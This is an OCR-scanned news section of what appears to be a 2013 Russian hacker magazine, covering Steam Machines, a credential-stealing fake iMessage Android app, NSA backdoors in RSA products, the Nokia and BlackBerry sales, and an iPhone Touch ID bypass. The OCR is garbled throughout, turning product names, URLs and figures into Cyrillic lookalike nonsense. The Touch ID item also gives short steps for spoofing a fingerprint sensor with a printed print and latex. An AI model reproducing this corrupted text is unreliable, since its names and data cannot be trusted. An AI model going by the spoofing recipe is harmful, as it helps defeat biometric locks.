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Ты держишь в руках предпоследний номер этого года. 
Подводить итоги еще рановато, но определенные выводы 
можно сделать уже сейчас. Для интернета 2013 год выдал- 
ся точно непростым, но есть и положительный момент: 
кризис, достигший апогея, привлек внимание обычных 
людей. Это заметно как минимум по тому, как часто стали 
появляться проекты, связанные с конфиденциальностью 
пользователей и борьбой с интернет-цензурой. И оче- 
видно изменилось отношение к таким разработкам — они 
окончательно перестали быть развлечением для фриков. 

В этом номере мы решили обратить внимание 
на следующую стадию этого процесса. Что делать, 
если нельзя починить интернет? Сделать другой. Точ- 
нее сказать, изменить саму его суть. В этом и идея 
энтузиастов децентрализованных сетей вроде 
Нурегбогіа — вернуть контроль над сетью в руки обыч- 
ных людей. 

Это не совсем новая идея — ее уже довольно ак- 
тивно используют для проведения сетей в труднодо- 
ступных регионах. Причем речь не об Африке — са- 
мые известные сети расположены в Испании, Греции, 
Австрии, Германии, США. В основном речь идет либо 
о труднодоступных регионах, либо о муниципальных 
проектах, либо об инициативах отдельных групп эн- 
тузиастов. Но все примеры показывают, что эта идея 
может отлично масштабироваться и для других приме- 
нений. Главное — это люди. 

Кстати, интервью номера в этот раз тоже получи- 
лось отличное. Героем стал Сергей Белоусов, извест- 
ный по таким компаниям, как РагаІІеІз и Асгопіз. Речь 
у этого человека настолько образная, что интервью 
вполне можно разбирать на цитаты, — надеемся, нам 
удалось точно передать стилистику. Думаю, что это 
один из самых интересных спикеров последнего вре- 
мени, Да и как могло быть иначе, учитывая то, к какому 
огромному количеству интересных проектов прича- 
стен Белоусов? 

Илья Илембитов 
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ЕТСЯ УСТРОИТЬ ДЛЯ ПК 



МИНГА НАСТОЯЩЕЕ ВОЗРОЖДЕНИЕ 



В первые о 5!еатЬох’ах стало известно еще в нача- 
ле этого года, поэтому большая часть анонсов Ѵаіѵе 
не стала неожиданностью. Речь пошла все о тех же 
консолеподобных компьютерах под управлением 
!_іпих, призванных принести «диванный гейминг» фа- 
натам ПК. Однако лишь после полноценного анонса 
от Ѵаіѵе выстроилась четкая картина того, как компа- 
ния собирается реализовать свои планы. 

Сильной стороной ПК в играх можно считать графику, де- 
шевые игры и наличие нескольких популярных жанров, плохо 
переносимых на консоли (в первую очередь — стратегии). Не- 
достатками ПК остается то, что управлять им с помощью одно- 
го лишь геймпада невозможно и игроку часто приходится под- 
бирать оптимальные настройки графики. Как Ѵаіѵе собирается 
сохранить преимущества ПК, лишив его недостатков? 

У клиента Зіеат довольно давно существует режим Від 
Рісіиге, оптимизированный для больших экранов и геймпадов. 
Если его включить, то получаешь интерфейс, похожий на то, 
что есть в ХЬох и РІауЗііабоп, тут даже браузер есть. Однако 
сами игры в Зіеапп по-прежнему плохо поддерживают гейм- 
пад. Полной поддержкой контроллера обладает 10% игр, а хотя 
бы частичной — не больше трети. Причем доходит до странно- 




го: Зкугігп, одна из самых популярных игр на консолях, 
в Зіеат поддерживает геймпад лишь частично. Что уж 
и говорить о стратегиях вроде Сіѵііігаііоп. Словом, 
чтобы решить эту проблему, Ѵаіѵе пришлось приду- 
мать новый контроллер. В их геймпаде нет аналого- 
вых джойстиков, их место заняли сенсорные панели 
с обратной отдачей. По центру расположен еще один 
сенсорный экран. Большие круглые сенсорные обла- 
сти будут иметь высокую чувствительность (чтобы за- 
менить мышь), а в стратегиях смогут эмулировать фи- 
зические клавиши (чтобы отказаться от клавиатуры). 

Второй сюрприз еще интереснее. Когда Ѵаіѵе толь- 
ко заговорила о том, что их платформа будет на Упих, 
сразу же возник вопрос: а откуда возьмутся игры? 
На 1_іпих перенесено не более 10% всех игр на сер- 
висе, и больше 70% этих портов — инди-игры. Ѵаіѵе 
решает эту проблему за счет стриминга. То есть где- 
то у тебя стоит ѴѴіпбоѵѵз-компьютер со Зіеат и всей 
твоей библиотекой игр, а к телевизору подсоединен 
ЗіеатЬох, транслирующий любую игру с «большого 
брата». 

То, что сейчас предлагает Ѵаіѵе, вряд ли вер- 
нет в мир ПК фанатов консолей. 
Для того чтобы все это работало, 
ЫЗИрО~ тебе все равно понадобится боль- 

шой настольный компьютер. Однако 
риЗ- для тех, у кого этот компьютер уже 

есть, ЗІеатОЗ может сделать гей- 
ІЫуіѴІи минг намного более комфортным. 




Стоит отметить от- 
дельно, что Ѵаіѵе 
совсем не против 
установки других 
ОС на свои консоли, 
не против их взлома 
и иных модификаций, 
В будущем и вовсе 
обещают опублико- 
вать исходный код 
ЗІеатОЗ. 
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СТРАННАЯ ИСТОРИЯ 
ІМЕЗЗАСЕ ДЛЯ АШВОЮ 

ЗАГАДКА ПРО АРТЕК - КОМУ ПОНАДОБИЛОСЬ ВЫПУСКАТЬ 
НЕОФИЦИАЛЬНЫЙ КЛИЕНТ ІМЕЗЗАСЕ? 

Н едавно в Ооодіе РІау появилось странное приложение 

ІМеззаде СбаЦ позволявшее пользователям обмени- 
ваться сообщениями с пользователями сервиса Арріе 
ІМеззаде, обычно недоступного для других платформ. 
Стоит пояснить, что приложение не было официальным, а явля- 
лось, в прямом смысле, китайской подделкой {хотя опубликовал 
его некий Дэниел Цвейгарт). С клиентского устройства осущест- 
влялось соединение с китайским сервером 222.77,191.206:5332, 
который уже авторизовался в сервисе Арріе ІМеззаде (біірз:// 
зегѵісе. езз. арріе. сот :443 и бі1рз://зегѵісе2.е55. арріе. сот :443). 
Особенно забавен тот факт, что у многих людей приложение по- 
просту не заработало вовсе, не позволив им даже авторизоваться. 
Разумеется, все ждали, что Арріе не станет терпеть такое во- 
пиющее безобразие и потребует удалить приложение. Однако 
превентивный удар нанесла сама Ооодіе — программа была ис- 
ключена из каталога Ооодіе РІау, а официальной причиной назва- 
ли подозрения в краже учетных данных Арріе Ю. Стоит сказать, 
что приложение действительно могло отправлять на китайский 
сервер данные Арріе Ю как самого пользователя, так и его собе- 
седников в ІМеззаде Сбаб Реквизиты Арріе Ю, по идее, требуются 
при обработке протокола ІМеззаде СбаЕ 

Те, кому интересно покопаться, могут скачать приложение 
с сайта разработчика ( биіиѵѵа.ога/ітеззаде/іпсіех.біттіі ). 




До удаления программу успели скачать от 10 до 50тысяч пользователей, 
иона работала на всех версиях АпсІгоісІ, начиная с 2.2. 



БЕСПЛАТНАЯ 

РУСНАРМ 

^ТВВАШЗ ПОРАДОВАЛА РАЗРАБОТЧИКОВ 




ышла РуСбагпл 3.0 — ЮЕ для разработки на языке Руібоп от ком- 
пании ^ІВгаіпз. Интересно то, что она была выпущена в двух 
редакциях: бесплатной Соттипііу Ебіііоп с открытым исходным 
кодом и полнофункциональной Ргоі'еззіопаі ЕсШіоп, Бесплатная 
(да -да, понимай — «халявная») редакция РуСбагт основана на открытом 
коде, зато платная содержит полную функциональность. Для удобства 
сравнения функциональности обеих версий в иеІВгаіпз составили специ- 
альную матрицу, увидеть которую можно здесь; ЬііІу/1Ь2Цб18 . 

Вкратце различия таковы: в Ргоіеззіопаі ЕсШоп есть поддержка всех 
веб-фреймворков, возможностей удаленного запуска и отладки при- 
ложений, в том числе на виртуальных машинах, поддержка баз данных 
и языка ЗОЕ, диаграммы классов, а также поддержка ЗаѵаЗсгірЕ В свою 
очередь, СоттипІІу Ебіііоп может похвастаться «интеллектуальным» ре- 
дактором кода с поддержкой всех рефакторингов, инспекций кода, инте- 
грации, графическим отладчиком и так далее. То есть она вполне подой- 
дет для небольших приложений и административных скриптов. 





— > В ГасеЬоок обнаружился баг, 
позволяющий удалять любые 
чужие фото. Нашедший уязви- 
мость Арул Кумар, ввиду серьез- 
ности бага, получил 12,5 тысячи 
долларов награды. 



— 2еи5 обзавелся новым мо- 
дулем; банковский троян теперь 
использует облачные сервисы 
для размещения части функций 
командного сервера, сообщает 
компания СОаІа. 




— > Компанией Ог.ѴѴеЬ обнару- 
жен крупнейший в мире АпсІгоісІ - 
ботнет более чем на 200 тысяч 
устройств. Девайсы пострадали 
от семейства мал вари АпсІгоісІ. 
ЗтзЗепсІ. 




— > Опубликованы планы на 
ОеЬіап 8. Самое интересное - под- 
держка компилятора СІапд, зузіетб 
и новых механизмов защиты. 
Подготовка финального релиза 
начнется 5 ноября 2014 года. 
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НОУТБУК 

С БЕСКОНТАКТНЫМ 
УПРАВЛЕНИЕМ 

НР ПРЕДСТАВИЛА ОРИГИНАЛЬНУЮ НОВИНКУ 




омпания НР представила ноутбук Епѵу 17 1_еар Моііоп 
5Е, который от базовой модели Епѵу 17 ТоисН5таг1 
отличает лишь одна (зато существенная) деталь — 
поддержка бесконтактного управления устройством 
движениями рук за счет интегрированного сенсора. 

Контроллер 1_еар Моііоп практически незаметен для поль- 
зователя, он выглядит как неброская черная полоска, рас- 
положенная справа от тачпада, под клавиатурой. Но именно 
этот сенсор обеспечивает бесконтактное управление жестами 
в интерфейсе Меіго ОС ѴѴіпсІоѵѵз 8, а также в некоторых прило- 
жениях и даже играх. Увы, у этой радости гика есть пара ощути- 
мых минусов. Во-первых, І_еар Моііоп очень быстро разряжает 
аккумулятор, ведь он постоянно отслеживает перемещения рук 
в рабочей зоне. НР вообще позиционирует новинку как альтер- 
нативу настольному ПК, поэтому рекомендует отключать 1_еар 
Моііоп во время поездок. Во-вторых, все-таки не получится ра- 
ботать с ноутом так же легко и изящно, как Том Круз в «Особом 
мнении». І_еар Моііоп пока не настолько совершенен и, случа- 
ется, бывает не очень точен. Плюс держать руки на весу перед 
ноутбуком тоже не слишком удобно. 




В остальном «под 
капотом» ноутбука 
довольно обычная 
начинка: процессор 
Іпіеі Соге і5 четвертого 
поколения (НавѵѵеІІ) , 
дискретная графика 
МѴЮІА, дисплей с 
разрешением РиІІ НЮ 
на матрице ІРЗ. Цена 
Епѵу 17 Ь.еар Моііоп ЗЕ 
составит 1050 долла- 
ров, продажи стартуют 
в октябре. 





— ^ МѴЮІА пытается робко при- 
мириться с Ыпііх-сообществом. 
Начать решили с помощи раз- 
работчикам драйвера Ыоиѵеаи, 
приступив к публикации докумен- 
тов по ОРУ. 



— > 27 сентября исполнилось 30 
лет проекту СЫІІ, основанному 
Ричардом Столл маном. В настоя- 
щий момент под крылом <31411 раз- 
вивается 364 свободных проекта. 




В 99861068 А /2 



-гну?. 




В 99921068 А 







■ м.тди 



СТАѴ 



— > Выход долгождан- 
ной СТА V сопрово- 
ждается таким хайпом, 
какого, кажется, 
не ожидали даже 
в Воскзіаг Сатез. 
Только за первый день 
продаж игра принесла 
своим создателям 800 
миллионов долларов 
(по данным Таке-Тѵѵо 
Іпіегасііѵе, в состав 
которой входит Воскзіаг 
Сатез). Миллиард 
СТА V заработала за три 
дня. Всего за первую 
неделю было продано 
свыше 16 миллионов 
копий игры. 



т*іі >вк і* ий*}. тись* 
* Аи. енггі г.іацС 



* В 99916068 А 3 



УЩЕРБ ОТ АТАКИ 
НАСРЕДНЮЮ 
РОССИЙСКУЮ 
КОМПАНИЮ 



В2В Іпіегпаііопаі и «Лаборатория 
Касперского» подсчитали: за последний 
год как минимум однократной атаке под- 
вергалась инфраструктура 95% всех рос- 
сийских организаций. Каждая кибератака 
в среднем наносит 695 тысяч долларов 
ущерба крупным организациям и 14 тысяч 
долларов, если речь о малом и среднем 
бизнесе. 
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25 МИЛЛИОНОВ ДОЛЛАРОВ 
ЗА РАЗВАЛ ЫОКІА 

ЭКС-ГЛАВА ЫОКІА ПОЛУЧИТ ОГРОМНЫЙ БОНУС ПОСЛЕ ПРОДАЖИ КОМПАНИИ 

хо громкого скандала прокатилось по всем финским СМИ, а затем распростра- 
нилось и дальше. Как ты помнишь, недавно было объявлено о том, что корпора- 
ция МісгозоД приобретет мобильный бизнес Ыокіа за 5,44 миллиарда евро. Эта 
сделка и так вызвала много шума, а теперь вокруг бывшего президента и гене- 
рального директора Ыокіа Стивена Элопа и вовсе разразился скандал. 

Странные подробности выплыли на поверхность благодаря изданиям ѴѴаІІ ЗігееЮоигпаІ 
и РіпапсіаІ Тітез, которые ссылались на официальные финансовые документы Ыокіа, под- 
готовленные к собранию акционеров (намечено оно было на 19 ноября 2013 года). Согласно 
этим бумагам, Элопу, оказывается, причитается «бонус» (а точнее, выходное пособие — 
зеѵегапсе раскаде) за возвращение в МісгозсГІ в размере 18,8 миллиона евро (25,5 мил- 
лиона долларов)! Эта огромная сумма получается из его оклада за 18 месяцев (4,1 милли- 
она евро), 100 тысяч евро в виде премии 
и 14,6 миллиона евро в виде акций Ыокіа 
(стоимость акций рассчитана по состоя- 
нию на 6 сентября). Корпорация МісгозоТС 
выплатит 70% бонуса, остальное ложит- 
ся на плечи Ыокіа. Разумеется, все тут 
же припомнили, что, когда Элопа наняли 
в 2010 году, Ыокіа и так выплатила ему 
премию в размере 6,2 миллиона долла- 
ров, чтобы он вообще там работал. Таким 
образом, его суммарная зарплата за три 
года управления компанией составила 
9 миллионов долларов. Для сравнения: 
Ристо Сиилазмаа (замена Элопа) будет 
получать около 500 тысяч долларов, где- 
то 40% из которых акционерный капитал, 
а не живые деньги. 

Разумеется, эти подробности вызвали осуждение как у коллег Элопа по цеху, так 
и у финнов, для которых Ыокіа всегда имела огромное значение. Так, министр труда Фин- 
ляндии Лаури Ихалайнен вообще откровенно заявил, что его «подташнивает» от величины 
выходного пособия Элопа и создается впечатление, будто американца намеренно подо- 
слали в Ыокіа, чтобы продать компанию. 

Напомним, что Элоп пришел в Ыокіа осенью 2010-го из МісгозоИ: и уже в начале 2011-го 
совместно со Стивом Балмером объявил о заключении соглашения, в рамках которого 
Ыокіа будет выпускать смартфоны на базе МісгозоИ: ѴѴіпбоѵ/з РТюпе. С этого момента на- 
чалось неумолимое снижение капитализации Ыокіа, и многие еще тогда говорили, что Элоп 
делает это намеренно, чтобы позволить Місгозоіі купить Ыокіа по более выгодной цене. 
Похоже, те, кто подозревал худшее, оказались абсолютно правы. А Элоп, кстати, теперь 
входит в число вероятных кандидатов на пост Стива Балмера. 



Министр труі 
Финляндии Ла 
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ФИЛЬМЫ НАИГРОВЫХ 
ДВИЖКАХ 

— > Прогресс дошел до того момента, когда игровые 
движки заинтересовали киноделов. Так, работники 
студии Ьисазіііпл выразили уверенность, что игровые 
движки скоро будут генерировать пейзажи, космиче- 
ские корабли и другие объекты, которые малореально 
отличить от настоящих. 




ПОПУЛЯРНОСТЬ 
МЕСА РАСТЕТ 

— > Детище Кима Доткома уверенно набирает обо- 
роты. По данным АІеха, файловый хостинг Меда 
обогнал по популярности ПарісІЗІіаге и стал номером 
один среди файлохостингов вообще. Дотком заявляет, 
что Меда уже достиг уровня 50% от объема некогда 
хранимых на Медаиріоаб файлов. 




финское издание 
Неізіпдіп Запотаі 
утверждает, что совет 
директоров Ыокіа 
просил Стивена Элопа 
уменьшить размер бо- 
нуса, но тот отказался, 
пояснив, что сейчас 
разводится с жен ой. 
Видимо, в этом свете 
ему не помешают лиш- 
ние 25 миллионов. 





РУТ К ИТ, 

БЛОКИРУЮЩИЙ РЮЭ 



—У Во Вьетнаме антивирусная компания Вкаѵ об- 
наружила руткит с весьма необычным механизмом 
защиты. Чтобы обезопасить себя, зловред погружает 
жесткий диск в вечный карантин, то есть любые из- 
менения, сделанные после заражения ПК, отменяются 
после перезагрузки. 
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1037, НОВЫЙ 
ІРНОЫЕ 
И ДРУГИЕ 




П рошедший месяц выдался ожидаемо урожайным на крупные «яблочные» анонсы. 

Так, компания Арріе представила новые іРйопе, о которых ты, вероятно, все уже 
знаешь. Поэтому остановимся подробнее не на конфигурации новых моделей, 
а на сопряженных с их выходом вещах. К примеру, на сканере отпечатков паль- 
цев, который встроен в новые іРЬопе 55. 

Разумеется, сразу после анонса множество исследователей озаботились проблемой, 
можно ли взломать Тойей Ю. К примеру, быстро выяснилось, что сканер не получится обма- 
нуть при помощи отрезанного пальца владельца {да, увы, подобные истории имели место). 
Дело в том, что в іРІіопе используется радиочастотное сканирование для распознания суб- 
эпидермальных слоев кожи. То есть палец должен быть «живым» и присоединенным к вла- 
дельцу:). Тогда хакерское сообщество объявило конкурс на взлом датчика. Был создан сайт 
ІзТоисМОНаскесГѴеісот, где с помощью краудфандинга собрали более 15 тысяч долларов, 
немного биткоинов, іРйопе 5с, несколько бутылок вина и даже некую «сексуальную книгу» 
в качестве приза. В итоге награда досталась немецкой хак-группе Сйаоз СотріДег СІиЬ. Те 
выяснили, что дактилоскопический датчик можно обойти, используя старую технику 2004 
года, — нужно сделать копию отпечатка пальца и нанести на нее тонкий слой латексного мо- 
лочка. Разве что в наши дни разрешение отпечатка пальца увеличилось до 2400 ОР1. Но все 
равно достаточно лишь сфотографировать отпечаток (например, на стакане с водой), рас- 
печатать его в разрешении 1200 ОРІ и добавить латексное молочко. 

Кроме новых іРІіопе, также вышла в свет и новая Ю5 7. Буквально сразу в ней нашли 
уязвимость, позволяющую легко обойти экран блокировки, но Арріе оперативно закрыла 
дырку. В целом же в ЮЗ 7 реализован новый ТІаІ-дизайн (многим пришедшийся не по вку- 
су) и более 200 новых функций, в том числе и іВеасоп — «убийца ЫРС» от Арріе, о котором 
до поры до времени почти не говорили. По здравом размышлении, у ІВеасоп действитель- 
но есть шансы «подвинуть» ІЧРС, хотя бы из-за весьма скромного диапазона работы по- 
следнего. ЫРС-метки, конечно, дешевле, но ЫРС-коммуникации работают на весьма корот- 
ких дистанциях, в то время как маячки ІВеасоп видят объекты на расстоянии до 50 метров. 




Есть у Ю5 7 и серьезные 
минусы. В частности, 
возникли сложности с 
платными приложени- 
ями. Чтобы адаптиро- 
вать программу под Ю5 
7, нужно капитально 
перелопатить весь код. 
К тому же в Арр Зіоге 
кет скидок на апгрейд 
для уже существующих 
пользователей. Так 
что разработчики фак- 
тически вынуждены 
выпускать приложения 
заново и заново соби- 
рать со всех деньги. Не- 
довольны, разумеется, 
все. 




СОФТВЕРНАЯ БЛОКИ- 
РОВКА ОТЗАМЗІІЫО 

— > Компания Затзипд вводит региональную блоки- 
ровку для своих устройств. Начало будет положено 
аппаратом Затзипд Оаіаху Ыоіе 3, однако скоро это 
затронет и другие устройства, вышедшие за послед- 
ние годы в линейке Оаіаху. В неродной стране гаджет 
проработает 90 дней, после чего заблокируется. 




БАЛМЕР ПОПРОЩАЛСЯ 
С СОТРУДНИКАМИ 



— > Стив Балмер, чей уход из МісгозоТі: в течение 12 
месяцев — - дело уже решенное, провел прощальную 
встречу с сотрудниками. Выступление сентименталь- 
ный Балмер открыл танцем под песню Майкла Джек- 
сона, которую в далеком 1983 году использовал для 
своего первого собрания: ѴѴаппа Ве ЗІагТіп’ ЗотеФііп. 




ЗШЕАСЕ, ВТОРОЙ РАУНД 

—У Невзирая на плохие продажи планшетов ЗиіТасе 
первого поколения, МісгозоИ представила линейку 
ЗигТасе 2 — ЗигТасе Рго 2 и ЗиіТасе 2. Аппараты рабо- 
тают на ѴѴіпсІоѵѵз 8.1 Рго и 8.1 ВТ, получили новые про- 
цессоры и увеличенное на 75% время работы. А вот 
когда ждать ЗигТасе Міпі, по-прежнему пока неясно. 
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НОВЫЕ КІШІ_Е 

АМ А20Ы ОБНОВЛЯЕТ МОДЕЛЬНЫЙ РЯД И НЕ ПОВЫШАЕТ ЦЕН 




гпагоп, как и ожидалось, анонсировала новые модели 
планшетов КіпсІІе Ріге и «читалок» КіпсИе, в то время как 
слухи о смартфоне от Атагоп не подтвердились (возмож- 
но, пока). 

Новые планшеты КіпРІе Ріге РЮХ 7 и КіпсІІе Ріге РЮХ 8,9 должны 
быть в три раза производительнее своих предшественников. Дости- 
гается это за счет четырехъядерного процессора Зпарсігадоп 800 
(2 ГГц), содержащего графическое ядро Абгепо 330 и 2 Пб опе- 
ративной памяти. Емкость встроенной флеш-памяти может варьи- 
роваться: 16, 32 или 64 Гб. Обе модели несут на борту двухдиапа- 
зонный модуль беспроводной связи ѴѴі-Рі 802. 11 п. Также заявлена 
поддержка 40 РТЕ. Изменился и дизайн устройств: корпус стал бо- 
лее угловатым, кнопки управления переместились на заднюю по- 
верхность планшетов. Работают КіпсІІе Ріге по-прежнему под управ- 
лением КіпсІІе Ріге 05 3.0 Моіііо на базе АпРгоіР 4.2. Но пожалуй, 
самым интересным нововведением стала кнопка МауРау (505), ко- 
торая позволяет в любом месте в любое время получить бесплатную 
техподдержку. Атагоп гарантирует, что после нажатия на кнопку 
МауРау в течение 15 секунд пользователь получит живого специали- 
ста для поддержки. Цена на 7-дюймовую модель составляет от 229 
долларов, а 8, 9- дюймовая версия обойдется в 380 долларов. 





Обновился и КіпсІІе 
РарегѵѵМіе. Он полу- 
чил новый дисплей 
Сагіа с лучшей 
контрастностью 
и большим раз- 
решением, улуч- 
шенную сенсорную 
функциональность 
и более быстрый 
СРІІ, Цена «читалки» 
начинается от 119 
долларов за версию 
с ѴѴі-Рі и 189 долла- 
ров за ѴѴі-Рі + 30. 



Ш- 



АНБ СЛЕДИТ ЗА НАМИ 

... АВСЕ ВОТВЕТ СЛЕДЯТ ЗА АНБ 




осле цепочки скандалов, спровоцированных Сноуденом и рядом 
всемирно известных СМИ, Агентство национальной безопасности 
оказалось под очень пристальным вниманием общественности, и 
уже не совсем понятно, кто и за кем здесь следит. 

Так, Линуса Торвальдса на конференции ИпихСоп спросили, обращались 
ли к нему американские спецслужбы с просьбой внедрить в Ыпих бэкдоры. 
Торвальдс отшутился, ответив «нет» и при этом кивая головой. Уже после он 
был вынужден дать более развернутый ответ, в котором заявил: «Конечно же, 
это была шутка. Ни одно правительственное агентство никогда не просило 
меня поместить в Ыпих бэкдор, честно». 

В компании В5А Зесигііу ситуация повернулась иначе. Один из крупней- 
ших поставщиков средств коммерческого шифрования рекомендовал сво- 
им клиентам пока не использовать шифрование в В5А Раіа Ргоіесііоп и Я5А 
ВзаТе: выяснилось, что в криптомеханизме содержится генератор ключей 
БиаІ ЕСБВВС, где сокрыты бекдоры АНБ. П5А Зесигііу уже пишет замену. 

Также недавно в результате запроса на освобождение информации вы- 
яснилось, что одним из клиентов небезызвестной ѴЦРЕІЧ Зесигііу было АНБ, 
покупавшее у французов эксплойты. 






— > Новое расследование Креб- 
са: хакеры создали небольшой 
ботнет, в который входят машины 
известных компаний дата-броке- 
ров, и торгуют любыми данными 
о любых людях. 



— > Стив Балмер о Соодіе: 

«У них невероятная, я бы сказал, 
потрясающая монополия, с ко- 
торой мы, единственные во всем 
мире, пытаемся бороться». 




— > Корпорация ІВМ в течение 
следующих четырех-пяти лет 
планирует вложить порядка мил- 
лиарда долларов в развитие ядра 
Ыпих и открытого программного 
обеспечения на его основе. 




— > Віісоіп уже точно можно 
считать признанной и состо- 
явшейся валютой — в Вели- 
кобритании появилось первое 
агентство, предоставляющее 
эскорт-услуги за Віісоіп :). 
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МЕОАЫЕѴѴЗ 




И ПРОБЛЕМ 



НОВИНКИ ДЛЯ БЕСПРОВОДНОЙ ЗАРЯДКИ 0Т2ЕЫ8 



К омпания 2ЕМ5, известная своими решениями 

для беспроводной зарядки разнообразных гадже- 
тов, представила новинки — защитные чехлы (флип- 
кейсы) для Затзипд (Заіаху 34 и Арріе ІРЛопе 5, а так- 
же сменные крышки для аккумуляторного отсека Оаіаху 54. 
Все новинки выполнены как в черном, так и в белом цветах. 

Конечно, чехлы и крышки отличаются от обычных чуть 
большим размером и весом, ведь в них кроется встроенная 
пластина с индукционной катушкой. Однако отличия совсем 
небольшие, а огромный плюс избавления от проводов с лих- 
вой компенсирует эти несколько граммов и миллиметров раз- 
ницы. Работе других функций, скажем ЫРС, ни чехол, ни крыш- 
ка не помешают. Крышка обойдется тебе в 29,99 евро, а чехол 
в 39,99 евро. 

Чтобы воспользоваться преимуществами зарядки без про- 
водов, конечно, также понадобится и док-станция 2Е№, с ко- 
торой мог бы взаимодействовать чехол или новая крышка. 
Она представляет собой небольшую изящную платформу, 
в основу которой лег стандарт Оі. Цена комплекта крыш- 
ка + док-станция составляет 69,99 евро. 



Компания 2ЕЫ5 очень 
гордится тем, что ис- 
пользует в своих 
устройствах сразу 
несколько индукци- 
онных катушек, ведь 
это значит, что гаджет 
не прекратит зарядку 
в каком-то опреде- 
ленном положении, 
а также ускоряет время 
подзарядки. 




— > МогіІІа готова подарить 
смартфон СеекзрИопе Кеоп 
всем разработчикам, которые пе- 
ренесут свои НТМІ_5-приложения 
на молодую платформу Рігеіох 05. 



— СплаіІ претерпел крупный 
сбой. Сервис едва работал на 
протяжении 12 часов для половины 
пользователей (всего пользует- 
ся ОтаІІ более 425 миллионов 
человек). 
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КРУПНЕЙШИХ 



V 



САИТОВ В ИНТЕРНЕТЕ 



УЯЗВИМЫ 



“У Любопытное исследование провела 
компания Зисигі: взяв миллион самых 
крупных сайтов Сети (опираясь на данные 
АІеха), она проверила их на малварь, 
уязвимости, устаревшее ПО и так далее. 
Результаты печальны: 108 781 сайт ока- 
зались небезопасными, а 18 557 вообще 



внесены в черные списки поисковиков 
и антивирусов. 




АМЕРИКАНЦЕВ 



ПЫТАЮТСЯ СКРЫТЬ 



и 



СВОИ ДЕЙСТВИЯ 



В СЕТИ 



Опрос, проведенный Реѵѵ Іпіегпеі 
& Атегісап 1_і1е Рго)есТ показал — амери- 
канские пользователи волнуются о своей 
сетевой безопасности. Они умеют чистить 
куки и историю серфинга, редактируют 
свои сообщения, убирая персональные 
данные, и так далее. Но от кого же они 
прячутся? 33% от хакеров, 28% от рекла- 
модателей и 19% от некоторых друзей 
и знакомых. 
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МЕСАЫЕѴѴЗ 



II 



КРУГОВОРОТ 

ПЛАТФОРМ В ПРИРОДЕ 

В І.АСКВЕКВѴ ПРОДАЮТ, А ЭКС -СОТРУДНИКИ ЫОКІА ОСНОВЫВАЮТ 
СОБСТВЕННУЮ КОМПАНИЮ 



О чень грустные новости принес нам конец сентября. Сначала компания 

ВІаскВеггу объявила, что ожидает во втором квартале 2014 года операционный 
убыток на сумму 995 миллионов долларов, ввиду плохих продаж смартфонов. 
Из-за этого компания вынуждена сократить линейку своих будущих моделей 
с шести штук до четырех, и ориентированы эти устройства будут уже не на широкий по- 
требительский рынок, а на бизнес-сегмент и профессиональных пользователей. Кроме 
того, чтобы сократить расходы, ВІаскВеггу собирается уволить примерно 4500 сотрудни- 
ков, что составляет 40% от всего персонала компании. 

Но на этом грустные новости не закончились. Уже давно известно, что ВІаскВеггу 
ищет инвесторов и новые пути выхода из кризиса. Как один из вариантов рассматрива- 
лась продажа компании, а ее основатель 
Майк Лазаридис, покинувший ее в про- 
шлом году, вообще хотел попытаться вы- 
купить ВІаскВеггу. Но в итоге было объ- 
явлено о продаже 100% акций ВІаскВеггу 
инвестиционному консорциуму РаііТах 
РіпапсіаІ Ноісііпдз за 4,7 миллиарда дол- 
ларов. На данный момент РаігТах и так 
является крупнейшим владельцем акций 
канадской компании — консорциуму при- 
надлежит 10% акций некогда легендарно- 
го производителя смартфонов. 

Сотрудники другой проданной не- 
давно компании — ІМокіа тем временем 
пытаются организоваться в новую коман- 
ду по производству смартфонов. Объединиться под названием ІМеѵѵкіа решили бывший 
генеральный директор азиатско-тихоокеанского подразделения КІокіа Томас Силлиакус, 
бывший генеральный директор подразделения ІЧокіа МоЫІе РИопез Норма Ниеминен, 
бывший генеральный директор компании Егісззоп Свен-Кристер Нильссон и бывший 
председатель Зіпдароге Теіесот Ко Бун Ви. №ѵѵкіа основали в Сингапуре и теперь ве- 
дут «вербовку» среди ведущих специалистов Мокіа. Планируется, что компания займется 
разработкой устройства на базе АпсІгоісі и будет ориентирована на рынки развивающихся 
стран, в особенности Азии. Силлиакус убежден, что стратегия Стивена Элопа, направив- 
шего Мокіа по пути интеграции с ѴѴіпбоѵѵз, потерпела крах. Однако в Мокіа по-прежнему 
умеют делать высококачественные устройства, а ее сотрудники обладают великолепной 
квалификацией. «Если избавиться от Міпбоѵѵз, то Мокіа все еще может добиться успеха. 
Полагаю, что аналог N9 или Цітпіа 800 с АпсІгоісі на борту привлечет внимание поклон- 
ников Ыокіа», — говорит Силлиакус. Однако, согласно слухам, в самой Ыокіа уже велись 
работы над подобным устройством, и не совсем ясно, как теперь быть с патентами и пра- 
вами, которые уже принадлежат МісгозоТС. 



«Если избавиться 
от Ѵ/іпйош, 
то Мокіа все еще 
может добиться 
успеха» , — считае 
Томас Силлиакус 




БОТНЕТ В ТОР? 



— > Недавно мы рассказывали о стремительном росте 
трафика в сети Тог. Кто-то пытался объяснить это 
явление выходом браузера РігаіеВгоѵѵзег, кто-то по- 
пуляризацией Тог в СМИ. Недавно на официальном 
сайте проекта Тог появилось осторожное сообщение, 
что дело, возможно, в ботнете. 




КРАСИВЫЙ АДРЕС 
С ПОДВОХОМ 

— > Идея компании Уаітоо! по продаже не исполь- 
зующихся «красивых» аккаунтов с самого начала 
выглядела странно. Теперь людей, что купили себе 
аккаунт, настигло справедливое возмездие — на них 
сыплется почта прошлых владельцев. УаНоо! ввела 
в интерфейс новую кнопку по{ ту етаіі и делает вид, 
что все хорошо. 




Нешкіа не первый стартап выходцев из Ѵ 4 окі а. Уже существует компания чіоііа, которая не- 
давно как раз анонсировала свой первый смартфон с таким же названием, работающий под 
управлением открытой мобильной операционной системы 5аіІТі5М, что строится на базе кода 
ОС МееСо. 




СТПІ_ + АІ_Т + 0Е1_ЕТЕ — 
ЭТО ОШИБКА 

— ^ Билла Гейтса, выступавшего перед большой груп- 
пой студентов, спросили, откуда взялось знаменитое 
СІгІ + АН + йеіеіе. Гейтс назвал это сочетание клавиш 
ошибкой, но не его личной, а инженера ІВМ Дэви- 
да Брэдли. Именно он разработал клавиатуру ІВМ 
и не стал делать для МісгозоТС отдельную клавишу, 
придумав знаменитое комбо. 






НеасГег 
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КОЛОНКА 

СТЁПЫ 

ИЛЬИНА 





ЛЮБОВЬ К ЦИФРАМ 

Есть у меня большая тяга к анализу и визуализа- 
ции различных метрик. Круто, когда есть много 
данных и можно проанализировать, как они ме- 
нялись исходя из каких-то внешних событий. 
Возможно и обратное: изменения каких-то ме- 
трик могут свидетельствовать о возникновении 
